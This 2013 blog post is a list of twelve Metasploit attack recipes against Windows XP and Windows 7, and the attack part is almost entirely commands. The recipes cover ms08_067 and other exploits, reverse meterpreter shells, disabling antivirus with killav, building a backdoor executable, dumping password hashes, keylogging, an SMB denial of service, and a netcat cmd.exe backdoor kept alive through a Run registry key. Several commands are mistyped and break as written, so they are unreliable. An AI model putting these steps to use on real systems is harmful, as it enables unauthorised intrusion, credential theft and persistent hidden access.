Wednesday, June 12, 2013

MetaSploit Attacks


Hey guys, I've already explained about Metasploit and a few of its attacks. This post is only for Metasploit users who know the basics of meterpreter, payloads and other stuff. Don't waste your time reading this if you don't know about Metasploit. So what's new in this post? Let's find out:

Requisites:

Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain

Note: All these tutorials are just commands; as you can see there are loads of them, so understand them on your own (you just need to run these commands).

Ok so without wasting a second let's do it.



Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1                ----->IP target
set payload windows/vncinject/bind_tcp
exploit


Attack 2.Metasploit vs Windows 7 and AVG

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1             ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell


Attack 3. Hacking By Metasploit . Windows xp Sp3 

use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1                --->ip attacker
set RHOST 192.168.1.1               ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit


Attack 4: Hacking win7 with metasploit

nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1    ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.             ------>ip target
set RPORT 4321
show options
exploit


Attack 5: Exploit vulnerability in Windows 7

sudo nmap 192.168.1.1         ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1             -----------ip target
set RPORT 445
run                              ----run the exploit


Attack 6: Metasploit backdooring

msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp                  
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1            --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg *                    ------->msg displayed on the screen


Attack 7: ms10 025 metasploit exploitation

nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7     --ip target
exploit


Attack 8: IEPeers: ms10_08_ie_behaviors Exploit

search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1        
set URIPATH /
set CMD calc.exe
set target 1
info                              ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/            ---enter
wait a few moments...


Attack 9: metasploit rpc_dum

nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1        ---->ip target
set LHOST 192.168.0.1        ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


Attack 10: Uploading A Backdoor Metasploit Netcat

meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


Attack 11:  BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7

cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3                ---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


Attack 12:  ms067 + netcat backdoor

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\
